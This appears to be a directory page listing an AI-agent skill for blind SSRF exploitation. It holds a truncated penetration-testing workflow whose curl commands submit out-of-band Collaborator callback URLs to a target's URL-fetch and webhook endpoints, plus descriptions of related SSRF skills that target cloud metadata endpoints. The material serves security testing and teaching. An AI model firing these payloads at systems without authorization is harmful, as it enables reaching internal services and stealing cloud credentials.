performing-blind-ssrf-exploitation

Featured

Detect and exploit blind Server-Side Request Forgery vulnerabilities using out-of-band techniques, DNS interactions, and timing analysis to access internal services and cloud metadata endpoints.

AI & Automation 12,642 stars 1468 forks Updated today Apache-2.0

Install

View on GitHub

Quality Score: 99/100

Stars 20%
100
Recency 20%
100
Frontmatter 20%
70
Documentation 15%
100
Issue Health 10%
50
License 10%
100
Description 5%
100

Skill Content

# Performing Blind SSRF Exploitation ## When to Use - When testing URL/webhook input parameters where server-side responses are not reflected - During assessment of applications that fetch external resources (avatars, previews, imports) - When testing PDF generators, image processors, or document converters for SSRF - During cloud security assessments to detect metadata endpoint access - When evaluating webhook functionality and URL validation implementations ## Prerequisites - Burp Suite Professional with Burp Collaborator for OOB detection - interact.sh or webhook.site for external callback monitoring - Understanding of SSRF attack vectors and internal network enumeration - Knowledge of cloud metadata endpoints (AWS, GCP, Azure) - VPS or controlled server for advanced exploitation callback handling - Python with requests library for automation scripts ## Workflow ### Step 1 — Identify Blind SSRF Input Points ```bash # Common SSRF-susceptible parameters: # url=, uri=, path=, dest=, redirect=, src=, source= # link=, imageURL=, callback=, webhook=, feed=, import= # Test URL fetch functionality curl -X POST http://target.com/api/fetch-url \ -H "Content-Type: application/json" \ -d '{"url": "http://BURP-COLLABORATOR-SUBDOMAIN.oastify.com"}' # Test webhook configuration curl -X POST http://target.com/api/webhooks \ -H "Authorization: Bearer TOKEN" \ -H "Content-Type: application/json" \ -d '{"callback_url": "http://COLLABORATOR.oastify.com/webhook"}' # Test image...

Details

Author
mukul975
Repository
mukul975/Anthropic-Cybersecurity-Skills
Created
3 months ago
Last Updated
today
Language
Python
License
Apache-2.0

Similar Skills

Semantically similar based on skill content — not just same category

AI & Automation Featured

exploiting-server-side-request-forgery

Identifying and exploiting SSRF vulnerabilities to access internal services, cloud metadata, and restricted network resources during authorized penetration tests.

12,642 Updated today
mukul975
DevOps & Infrastructure Listed

exploiting-server-side-request-forgery

Identifying and exploiting SSRF vulnerabilities to access internal services, cloud metadata, and restricted network resources during authorized penetration tests.

6 Updated today
26zl
DevOps & Infrastructure Solid

performing-ssrf-vulnerability-exploitation

Test for Server-Side Request Forgery vulnerabilities by probing cloud metadata endpoints, internal network services, and protocol handlers through user-controllable URL parameters. Tests AWS/GCP/Azure metadata APIs (169.254.169.254), internal port scanning via HTTP, URL scheme bypass techniques, and DNS rebinding detection.

12,642 Updated today
mukul975
AI & Automation Solid

hunt-ssrf

Hunting skill for ssrf vulnerabilities. Built from 15 public bug bounty reports including AWS metadata SSRF (HackerOne $25k Analytics PDF, Shopify Exchange $25k, Capital One 106M-record breach, Dropbox/HelloSign $4,913), GCP metadata SSRF (Snapchat $4k), Azure IMDS SSRF (Azure DevOps $15k chain, ChatGPT Custom Actions MSRC), DNS rebinding SSRF (Concrete CMS, GitLab UrlBlocker), gopher-protocol-to-Redis-RCE (Yahoo Mail $15k), link-preview SSRF (Reddit Matrix $6k), and headless-browser PDF-generator SSRF chains. Use when hunting SSRF on any target — OOB Collaborator confirmation mandatory for blind cases.

1,380 Updated 4 days ago
elementalsouls
AI & Automation Listed

ssrf

Detect Server-Side Request Forgery where user-controlled URLs can reach internal services, cloud metadata endpoints, or bypass network boundaries.

0 Updated today
Liaabnormal676